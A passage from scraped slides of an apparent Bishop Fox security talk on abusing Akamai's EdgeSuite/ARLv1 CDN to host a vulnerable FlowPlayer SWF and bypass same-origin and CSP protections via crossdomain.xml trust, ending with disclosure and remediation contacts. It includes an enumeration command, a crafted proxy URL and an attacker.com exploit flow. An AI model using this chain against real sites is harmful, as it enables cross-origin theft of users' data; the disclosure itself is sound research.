• This process is known as Akamaization of a URL.
• Akamai’s network works by pulling the file off your server and hosting it on the CDN.
SOP BYPASS AT SCALE
ARLv1
![Page 88: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/88.jpg)
8888
• If you point akamai.example.com to Akamai’s EdgeSuite service, we can host arbitrary files on your server.
• However, you can only use the site to retrieve files from a specific list of sites.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
![Page 89: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/89.jpg)
8989
SOP BYPASS AT SCALEARLv1
![Page 90: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/90.jpg)
9090
• We took to enumerating what sites could be proxied.
./subbrute.py edgesuite.net
• After some searching we found a site on the whitelist.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
![Page 91: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/91.jpg)
9191
SOP BYPASS AT SCALEARLv1 & EdgeSuite
![Page 92: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/92.jpg)
9292
http://mediapm.edgesuite.net/flow/swf/flowplayer-v3.2.16.swf
![Page 93: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/93.jpg)
9393
• Not only do they host FlowPlayer, they host FlowPlayer 3.2.16, which allows the loading of any arbitrary Flash plugins.
• So, putting it together - we can now host an intentionally vulnerable version of FlowPlayer on any site mapped to EdgeSuite, and then hijack it.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
![Page 94: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/94.jpg)
9494
http://i.legitbank.com/f/1/1/1/mediapm.edgesuite.net/flow/swf/flowplayer-
v3.2.16.swf
![Page 95: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/95.jpg)
9595
(Artist interpretation)
![Page 96: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/96.jpg)
9696
THE FALLOUT
Full Exploit Flow
User logs in to legitbank.com
legitbank.com
![Page 97: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/97.jpg)
9797
THE FALLOUT
Full Exploit Flow
attacker.com
legitbank.com
![Page 98: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/98.jpg)
9898
THE FALLOUT
Full Exploit Flow
akamai.legitbank.com
mediapm.edgesuite.net
attacker.com
legitbank.com
![Page 99: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/99.jpg)
9999
mediapm.edgesuite.net
THE FALLOUT
Full Exploit Flow
ATTACKER LOADS MALICIOUS PLUGIN INTO FLOWPLAYER
attacker.com
legitbank.com
akamai.legitbank.com
![Page 100: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/100.jpg)
100100
THE FALLOUT
Full Exploit Flow
HIJACKED FLOWPLAYER REQUESTS PAGE FROM
LEGITBANK.COM
DUE TO A *.LEGITBANK.COM ENTRY IN CROSSDOMAIN.XML
THIS IS ALLOWED.
mediapm.edgesuite.net
akamai.legitbank.com
attacker.com
legitbank.com
![Page 101: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/101.jpg)
REVISITING FLASH CROSS-DOMAIN POLICIESSOP BYPASS AT SCALE
![Page 102: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/102.jpg)
102102
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File
http://legitbank.com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=“*.legitbank.com”>
<allow-access-from domain=“*.thirdparty.com”>
</cross-domain-policy>
![Page 103: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/103.jpg)
103103
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File
http://legitbank.com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=“*.legitbank.com”>
<allow-access-from domain=“*.thirdparty.com”>
</cross-domain-policy>
IF ANY SUBDOMAIN IS MAPPED TO EDGESUITE THE
SITE IS COMPROMISED
IF ANY SUBDOMAIN IS MAPPED TO EDGESUITE THE
SITE IS COMPROMISED
![Page 104: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/104.jpg)
104104
• A site doesn’t even have to use Akamai EdgeSuite to be vulnerable.
• They just have to trust them via crossdomain.xml.
• Due to Flash’s crossdomain.xml policies being so commonly misconfigured, we can increase our impact to affect many more sites.
SOP BYPASS AT SCALE
Expanding Attack Surface With Flash
![Page 105: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/105.jpg)
THE FALLOUTWHO USES A CDN ANYWAYS?
![Page 106: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/106.jpg)
VERIZON WIRELESSMY OTHER NUMBER IS YOUR NUMBER
![Page 107: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/107.jpg)
NOSCRIPTA WHITELIST IS MORE A LIST OF POSSIBILITIES
![Page 108: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/108.jpg)
108108
• HTTP Content Security Policy (CSP) will not prevent this type of attack.
• Since we are loading their SWF into our own page, the CSP does not apply.
• Additionally, we can use vulnerable SWFs hosted on Content Delivery Networks (CDNs) to exploit site’s with CDNs in their CSP whitelists.
CROSSING THE ORIGIN BOUNDARY
Bypassing HTTP Content Security Policy
![Page 109: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/109.jpg)
109109
• Akamai has been super supportive to us throughout this disclosure process.
• In order to address this vulnerability, they have provided us with instructions on remediation if you are vulnerable.
HOW DO I FIX THIS?
Remediation
![Page 110: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/110.jpg)
110110
• You may already be patched!
• If you are an Akamai customer you need to call Akamai’s support line at 1-617-444-4699 or email them at [email protected].
• Public inquires can be directed to Rob Morton at 1-617-444-3641 or [email protected].
HOW DO I FIX THIS?
How Do I Remediate?
![Page 111: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/111.jpg)
111111
• If you are a security researcher with a vulnerability in Akamai you can reach them at [email protected].
• They have a PGP key available on their website that you can use for more sensitive communications.
• Akamai is hiring folks at:https://www.akamai.com/us/en/about/careers/index.jsp.
HOW DO I FIX THIS?
Future Security Research
![Page 112: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/112.jpg)
@BISHOPFOX
FACEBOOK.COM/BISHOPFOXCONSULTING
LINKEDIN.COM/COMPANY/BISHOP-FOX
GOOGLE.COM/+BISHOPFOX
Contact Us
![Page 113: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/113.jpg)
Thank you